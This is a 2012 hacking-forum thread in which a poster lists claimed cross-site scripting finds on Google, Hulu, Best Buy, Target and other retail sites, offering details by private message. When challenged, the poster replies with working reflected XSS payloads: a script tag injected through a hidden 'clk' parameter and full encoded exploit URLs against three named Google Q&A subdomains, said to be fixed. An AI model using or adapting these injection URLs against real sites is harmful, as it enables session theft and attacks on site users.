Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's filter_list
Author
Message
[Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's #1
To get myself started here, here are some XSS's I have found in the past few weeks or so.
Google.com
IT HAS BEEN FIXED
Here is a screenshot of the XSS.
Spoiler:
[Image: xWoZl.jpg]


Email they sent me;
Spoiler:
[Image: Ytx86.jpg]


Oakley.com
Spoiler:
[Image: hQfUU.jpg]


Hulu.com
Spoiler: Screenshot
[Image: SbFKX.jpg]


BestBuy.com
Spoiler:
[Image: gKpzU.jpg]



Logitech.com
Spoiler:
[Image: CNDm0.jpg]



Target.com
Spoiler:
[Image: L27vL.jpg]


Jcrew.com
Spoiler:
[Image: eYjK5.jpg]


PM me if you want more information.

Reply

RE: [Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's #2
1) goes to google
2) Changes url to javascript:void(alert('xss'));
3) Press enter
4) Take screenshot
Pierce the life fibers with your drill.

Reply

RE: [Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's #3
(03-22-2012, 11:55 PM)1234hotmaster Wrote: 1) goes to google
2) Changes url to javascript:void(alert('xss'));
3) Press enter
4) Take screenshot
You're fucking dumb.

The following locations were vulnerable;
http://www.google.com/baraza/en
http://www.ejabat.google.com
http://www.guru.google.co.th

All of them are some sort of Q&A system.
The pages that were vulnerable on each of them were;
Ask *.com/ask?
Ask an Admin *.com/aask?
The query that I used were;
Code:
?subject=Subject&clk=Tes"/><script>alert('PiHF')</script>&pli=1

The input that was vulnerable was called clk.
It was a hidden input.
Here is what it looked like in the source;
Code:
<input type="hidden" name=clk value=Tes"><script>alert("PiHF")</script>

This worked on;

http://www.google.com/baraza/en
Ask an Admin:
Code:
http://www.google.com/baraza/en/aask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&pli=1

Ask
Code:
http://www.google.com/baraza/en/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&pli=1

http://www.ejabat.google.com
Ask an Admin:
Code:
http://www.ejabat.google.com/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&pli=1
Ask:
Code:
ejabat.google.com/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&


http://www.guru.google.co.th
Ask:
Code:
http://www.guru.google.co.th/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&

Ask an Admin:
Code:
http://www.guru.google.co.th/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&

What further proof do you want?

Reply